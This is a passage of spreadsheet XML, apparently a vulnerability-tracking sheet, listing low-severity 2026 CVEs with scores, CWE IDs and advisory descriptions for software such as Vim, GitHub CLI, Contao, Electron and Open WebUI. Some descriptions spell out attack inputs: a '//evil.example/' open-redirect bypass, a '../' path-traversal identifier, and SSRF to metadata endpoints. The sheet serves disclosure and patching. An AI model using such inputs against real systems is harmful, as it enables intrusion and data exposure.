        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54548</t>
        </is>
      </c>
    </row>
    <row r="5843">
      <c r="A5843" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5843" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55290</t>
        </is>
      </c>
      <c r="C5843" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D5843" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5843" s="5" t="inlineStr"/>
      <c r="F5843" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5843" s="5" t="inlineStr"/>
      <c r="H5843" s="5" t="inlineStr"/>
      <c r="I5843" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5843" s="5" t="inlineStr"/>
      <c r="K5843" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L5843" s="5" t="inlineStr">
        <is>
          <t>In setTo of ResourceTypes.cpp, there is a possible out-of-bounds heap read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M5843" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55290</t>
        </is>
      </c>
    </row>
    <row r="5844">
      <c r="A5844" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5844" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59326</t>
        </is>
      </c>
      <c r="C5844" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D5844" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5844" s="5" t="inlineStr"/>
      <c r="F5844" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5844" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="H5844" s="5" t="inlineStr">
        <is>
          <t>broadcom:spring_tools</t>
        </is>
      </c>
      <c r="I5844" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J5844" s="5" t="inlineStr"/>
      <c r="K5844" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L5844" s="5" t="inlineStr">
        <is>
          <t>The Spring Boot language server logs the raw value of the https_proxy/HTTPS_PROXY/http_proxy/HTTP_PROXY environment variable at INFO level whenever it creates an outbound HTTP client and no explicit http.proxy workspace setting is configured. Corporate proxy URLs frequently embed Basic-auth credentials in the form http://user:pass@proxy:8080, and the language server writes this value to its log file without any redaction. Since language server log files are often attached to bug reports or are readable by other local users/processes, this can result in disclosure of proxy credentials.
Affected Spring Products and Versions:
Spring Tools for Eclipse: 5.2.0 and earlier
Spring Tools for VSCode / Cursor / Theia: 2.2.0 and earlier</t>
        </is>
      </c>
      <c r="M5844" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59326</t>
        </is>
      </c>
    </row>
    <row r="5845">
      <c r="A5845" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5845" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64652</t>
        </is>
      </c>
      <c r="C5845" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D5845" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5845" s="5" t="inlineStr"/>
      <c r="F5845" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5845" s="5" t="inlineStr"/>
      <c r="H5845" s="5" t="inlineStr"/>
      <c r="I5845" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J5845" s="5" t="inlineStr"/>
      <c r="K5845" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="L5845" s="5" t="inlineStr">
        <is>
          <t>GitHub CLI (gh) is GitHub's official command line tool. Prior to version 2.97.0, gh auth status masked only the characters after the last underscore in certain fine-grained personal access tokens and GitHub App tokens. As a result, part of an affected token could appear in terminal or CI output that is captured or shared. Authenticated users are affected if they ran gh auth status (without the --show-token flag) with a token type whose format contains an underscore after the prefix. This includes fine-grained personal access tokens (github_pat_*) and GitHub App installation and user access tokens (ghs_*, ghu_*; for example, ghs_&lt;APPID&gt;_&lt;JWT&gt;), as well as the Actions GITHUB_TOKEN. Classic tokens such as gho_* and ghp_* have an underscore-free body and are not affected. This issue is fixed in version 2.97.0.</t>
        </is>
      </c>
      <c r="M5845" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64652</t>
        </is>
      </c>
    </row>
    <row r="5846">
      <c r="A5846" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5846" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73071</t>
        </is>
      </c>
      <c r="C5846" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D5846" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5846" s="5" t="inlineStr"/>
      <c r="F5846" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5846" s="5" t="inlineStr"/>
      <c r="H5846" s="5" t="inlineStr"/>
      <c r="I5846" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J5846" s="5" t="inlineStr"/>
      <c r="K5846" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L5846" s="5" t="inlineStr">
        <is>
          <t>Vim is an open source, command line text editor. From 9.2.0511 until 9.2.0844, json_decode_item() in src/json.c can retain a stale pointer after json_decode_string() invokes channel_fill() to refill and free the current buffer, causing the error path to read freed memory instead of reader-&gt;js_buf + reader-&gt;js_used when an invalid JSON string spans buffers. This issue is fixed in version 9.2.0844.</t>
        </is>
      </c>
      <c r="M5846" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73071</t>
        </is>
      </c>
    </row>
    <row r="5847">
      <c r="A5847" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5847" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79727</t>
        </is>
      </c>
      <c r="C5847" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D5847" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5847" s="5" t="inlineStr"/>
      <c r="F5847" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5847" s="5" t="inlineStr"/>
      <c r="H5847" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I5847" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5847" s="5" t="inlineStr"/>
      <c r="K5847" s="5" t="inlineStr">
        <is>
          <t>CWE-1258</t>
        </is>
      </c>
      <c r="L5847" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Exposure of Sensitive System Information Due to Uncleared Debug Information vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to information exposure.</t>
        </is>
      </c>
      <c r="M5847" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79727</t>
        </is>
      </c>
    </row>
    <row r="5848">
      <c r="A5848" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5848" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79966</t>
        </is>
      </c>
      <c r="C5848" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D5848" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5848" s="5" t="inlineStr"/>
      <c r="F5848" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5848" s="5" t="inlineStr"/>
      <c r="H5848" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I5848" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5848" s="5" t="inlineStr"/>
      <c r="K5848" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L5848"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M5848" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79966</t>
        </is>
      </c>
    </row>
    <row r="5849">
      <c r="A5849" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5849" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80169</t>
        </is>
      </c>
      <c r="C5849" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D5849" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5849" s="5" t="inlineStr"/>
      <c r="F5849" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5849" s="5" t="inlineStr"/>
      <c r="H5849" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I5849" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5849" s="5" t="inlineStr"/>
      <c r="K5849" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L5849"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M5849" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80169</t>
        </is>
      </c>
    </row>
    <row r="5850">
      <c r="A5850" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5850" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80175</t>
        </is>
      </c>
      <c r="C5850" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D5850" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5850" s="5" t="inlineStr"/>
      <c r="F5850" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5850" s="5" t="inlineStr"/>
      <c r="H5850" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I5850" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5850" s="5" t="inlineStr"/>
      <c r="K5850" s="5" t="inlineStr">
        <is>
          <t>CWE-538</t>
        </is>
      </c>
      <c r="L5850" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Insertion of Sensitive Information into Externally-Accessible File or Directory vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to information exposure.</t>
        </is>
      </c>
      <c r="M5850" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80175</t>
        </is>
      </c>
    </row>
    <row r="5851">
      <c r="A5851" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5851" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86485</t>
        </is>
      </c>
      <c r="C5851" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D5851" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5851" s="5" t="inlineStr"/>
      <c r="F5851" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5851" s="5" t="inlineStr"/>
      <c r="H5851" s="5" t="inlineStr"/>
      <c r="I5851" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5851" s="5" t="inlineStr"/>
      <c r="K5851" s="5" t="inlineStr">
        <is>
          <t>CWE-291</t>
        </is>
      </c>
      <c r="L5851" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18634 iP spoofing via HTTP headers allowed forged Bitbucket webhooks</t>
        </is>
      </c>
      <c r="M5851" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86485</t>
        </is>
      </c>
    </row>
    <row r="5852">
      <c r="A5852" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5852" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86503</t>
        </is>
      </c>
      <c r="C5852" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D5852" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5852" s="5" t="inlineStr"/>
      <c r="F5852" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5852" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H5852" s="5" t="inlineStr"/>
      <c r="I5852" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5852" s="5" t="inlineStr"/>
      <c r="K5852" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5852" s="5" t="inlineStr">
        <is>
          <t>In JetBrains IntelliJ IDEA before 2026.2.2 opening an untrusted project could trigger SSRF via Kubernetes spec-source URL fetching</t>
        </is>
      </c>
      <c r="M5852" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86503</t>
        </is>
      </c>
    </row>
    <row r="5853">
      <c r="A5853" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5853" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86505</t>
        </is>
      </c>
      <c r="C5853" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D5853" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5853" s="5" t="inlineStr"/>
      <c r="F5853" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5853" s="5" t="inlineStr"/>
      <c r="H5853" s="5" t="inlineStr"/>
      <c r="I5853" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5853" s="5" t="inlineStr"/>
      <c r="K5853" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="L5853" s="5" t="inlineStr">
        <is>
          <t>In JetBrains IntelliJ IDEA before 2026.2.2 missing project-trust check leaked project metadata to JetBrains Marketplace</t>
        </is>
      </c>
      <c r="M5853" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86505</t>
        </is>
      </c>
    </row>
    <row r="5854">
      <c r="A5854" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5854" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86564</t>
        </is>
      </c>
      <c r="C5854" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D5854" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5854" s="5" t="inlineStr"/>
      <c r="F5854" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5854" s="5" t="inlineStr"/>
      <c r="H5854" s="5" t="inlineStr"/>
      <c r="I5854" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5854" s="5" t="inlineStr"/>
      <c r="K5854" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5854" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in DPDK lib/vhost. Missing length validation before reading command_data in the virtio-net control-queue handler can cause an out-of-bounds read and a host process crash.</t>
        </is>
      </c>
      <c r="M5854" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86564</t>
        </is>
      </c>
    </row>
    <row r="5855">
      <c r="A5855" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5855" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28652</t>
        </is>
      </c>
      <c r="C5855" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D5855" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5855" s="5" t="inlineStr"/>
      <c r="F5855" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5855" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5855" s="5" t="inlineStr"/>
      <c r="I5855" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5855" s="5" t="inlineStr"/>
      <c r="K5855" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5855" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of RangingServiceImpl.java, there is a possible MITM due to a missing permission check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M5855" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28652</t>
        </is>
      </c>
    </row>
    <row r="5856">
      <c r="A5856" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5856" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48707</t>
        </is>
      </c>
      <c r="C5856" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D5856" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5856" s="5" t="inlineStr"/>
      <c r="F5856" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5856" s="5" t="inlineStr"/>
      <c r="H5856" s="5" t="inlineStr"/>
      <c r="I5856" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5856" s="5" t="inlineStr"/>
      <c r="K5856" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5856" s="5" t="inlineStr">
        <is>
          <t>InstantCMS is a free and open source content management system. Versions prior to 2.18.2 have a Server-Side Request Forgery (SSRF) vulnerability in the file upload functionality (`system/core/uploader.php` at lines 509-532). When the "upload from URL" feature follows an HTTP redirect, the redirected target URL bypasses the private IP address blacklist check. This allows authenticated users to scan and access internal network services. Version 2.18.2 contains a fix.</t>
        </is>
      </c>
      <c r="M5856" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48707</t>
        </is>
      </c>
    </row>
    <row r="5857">
      <c r="A5857" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5857" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49456</t>
        </is>
      </c>
      <c r="C5857" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D5857" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5857" s="5" t="inlineStr"/>
      <c r="F5857" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5857" s="5" t="inlineStr"/>
      <c r="H5857" s="5" t="inlineStr"/>
      <c r="I5857" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5857" s="5" t="inlineStr"/>
      <c r="K5857" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L5857" s="5" t="inlineStr">
        <is>
          <t>Waku is the minimal React framework. Prior to version 1.0.0-beta.1, the unstable_redirect() helper exported from waku/router/server (packages/waku/src/router/define-router.tsx:156–161) accepts an arbitrary string and reflects it unchanged into the HTTP Location response header with no URL validation, scheme restriction, or path-only enforcement. Any application that passes user-controlled input to this helper — the natural pattern documented in the JSDoc and official fixtures — is vulnerable to open redirect attacks. An attacker who convinces a victim to click a crafted link can silently redirect the browser to an arbitrary external domain, enabling phishing, credential harvesting, and OAuth token theft. Additionally, scheme-relative URLs (//evil.example/) bypass naive https?://-only allow-list filters that developers might add as ad-hoc mitigations. This issue has been patched in version 1.0.0-beta.1.</t>
        </is>
      </c>
      <c r="M5857" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49456</t>
        </is>
      </c>
    </row>
    <row r="5858">
      <c r="A5858" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5858" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54787</t>
        </is>
      </c>
      <c r="C5858" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D5858" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5858" s="5" t="inlineStr"/>
      <c r="F5858" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5858" s="5" t="inlineStr"/>
      <c r="H5858" s="5" t="inlineStr"/>
      <c r="I5858" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J5858" s="5" t="inlineStr"/>
      <c r="K5858" s="5" t="inlineStr">
        <is>
          <t>CWE-324</t>
        </is>
      </c>
      <c r="L5858" s="5" t="inlineStr">
        <is>
          <t>sigstore-go is a Go library for Sigstore signing and verification. Prior to 1.2.1, sigstore-go does not check a bundle signing timestamp against the validity window of an ExpiringKey wrapping a self-managed long-lived signing key without a certificate, which can allow an attacker holding expired key material to sign accepted bundles. This issue is fixed in version 1.2.1.</t>
        </is>
      </c>
      <c r="M5858" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54787</t>
        </is>
      </c>
    </row>
    <row r="5859">
      <c r="A5859" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5859" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55825</t>
        </is>
      </c>
      <c r="C5859" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D5859" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5859" s="5" t="inlineStr"/>
      <c r="F5859" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5859" s="5" t="inlineStr"/>
      <c r="H5859" s="5" t="inlineStr"/>
      <c r="I5859" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J5859" s="5" t="inlineStr"/>
      <c r="K5859" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L5859" s="5" t="inlineStr">
        <is>
          <t>Contao is an Open Source CMS. In versions 5.7.0 through 5.7.6, an authenticated backend user who can access one job can request an attachment identifier containing ../ segments and make the job attachment download endpoint read a file from another job directory inside var/job-attachments. The controller authorizes only the jobUuid route parameter. The later attachment lookup joins that authorized job UUID with the attacker-controlled identifier, then passes the combined path to the virtual filesystem. VirtualFilesystem::resolve() canonicalizes the whole path and only rejects paths that escape the filesystem mount, so authorized-job/../victim-job/debug_log.csv becomes victim-job/debug_log.csv. This is a cross-job authorization bypass for known job attachment paths. It is not a practical brute-force against unknown jobs because job directories are UUID v4 values.</t>
        </is>
      </c>
      <c r="M5859" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55825</t>
        </is>
      </c>
    </row>
    <row r="5860">
      <c r="A5860" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5860" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57232</t>
        </is>
      </c>
      <c r="C5860" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D5860" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5860" s="5" t="inlineStr"/>
      <c r="F5860" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5860" s="5" t="inlineStr"/>
      <c r="H5860" s="5" t="inlineStr"/>
      <c r="I5860" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J5860" s="5" t="inlineStr"/>
      <c r="K5860" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5860" s="5" t="inlineStr">
        <is>
          <t>Contao is an Open Source CMS. From 5.3.35 through 5.3.47 and from 5.7.0-RC1 through 5.7.8, the Feed Reader front-end module passes configured RSS feed URLs from FeedReaderController::getResponse() to feedIo-&gt;read() without scheme or private-address validation, allowing a backend user with module-edit permissions to make the server request internal network services, loopback addresses, or cloud metadata endpoints. In core-bundle/src/Controller/FrontendModule/FeedReaderController.php, the getResponse() function iterates over the configured feed URLs and passes each one directly to the HTTP client (via $this-&gt;feedIo-&gt;read($url, new Feed())) with no validation, while the DCA field definition for rss_feed in tl_module.php carries no URL scheme or host validation and the HTTP client is wired as @psr18.http_client (Symfony HttpClient) with no SSRF protection configured, since NoPrivateNetworkHttpClient is not used. This issue is fixed in versions 5.3.48.</t>
        </is>
      </c>
      <c r="M5860" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57232</t>
        </is>
      </c>
    </row>
    <row r="5861">
      <c r="A5861" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5861" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61908</t>
        </is>
      </c>
      <c r="C5861" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D5861" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5861" s="5" t="inlineStr"/>
      <c r="F5861" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5861" s="5" t="inlineStr"/>
      <c r="H5861" s="5" t="inlineStr"/>
      <c r="I5861" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5861" s="5" t="inlineStr"/>
      <c r="K5861" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5861" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Cyrus IMAP before 3.12.4. A JMAP email-header blob ID can reference an out-of-bounds index. An authenticated user could attempt to download a crafted JMAP blob ID of the form H&lt;emailid&gt;-&lt;index&gt;, which could read past the end of the internal blob_headers array during download, exposing adjacent heap memory.</t>
        </is>
      </c>
      <c r="M5861" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61908</t>
        </is>
      </c>
    </row>
    <row r="5862">
      <c r="A5862" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5862" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70483</t>
        </is>
      </c>
      <c r="C5862" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D5862" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5862" s="5" t="inlineStr"/>
      <c r="F5862" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5862" s="5" t="inlineStr"/>
      <c r="H5862" s="5" t="inlineStr"/>
      <c r="I5862" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J5862" s="5" t="inlineStr"/>
      <c r="K5862" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5862" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.6 until 0.11.0, DELETE /api/v1/chats/{id} cancelled a chat's in-flight tasks before checking whether the caller could delete that chat. Any authenticated user who knew another user's chat id could abort that user's running model response, title generation, or tag generation, even though the delete was refused and no chat data was deleted, modified, or disclosed. This issue is fixed in 0.11.0.</t>
        </is>
      </c>
      <c r="M5862" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70483</t>
        </is>
      </c>
    </row>
    <row r="5863">
      <c r="A5863" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5863" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70600</t>
        </is>
      </c>
      <c r="C5863" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D5863" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5863" s="5" t="inlineStr"/>
      <c r="F5863" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5863" s="5" t="inlineStr">
        <is>
          <t>windows, java</t>
        </is>
      </c>
      <c r="H5863" s="5" t="inlineStr"/>
      <c r="I5863" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J5863" s="5" t="inlineStr"/>
      <c r="K5863" s="5" t="inlineStr">
        <is>
          <t>CWE-1021</t>
        </is>
      </c>
      <c r="L5863" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.8, 40.9.0, 41.2.1, and 42.0.0-beta.3, the native autofill popup could be positioned by a cross-origin iframe outside that iframe's bounds, over the embedding page's UI, enabling clickjacking or spoofing of trusted UI. Apps are only affected if they embed untrusted content in iframes within windows that also display trusted UI. Apps that do not embed untrusted third-party content are not affected. This issue is fixed in versions 39.8.8, 40.9.0, 41.2.1, and 42.0.0-beta.3.</t>
        </is>
      </c>
      <c r="M5863" s="6" t="inlineStr">
        <is>
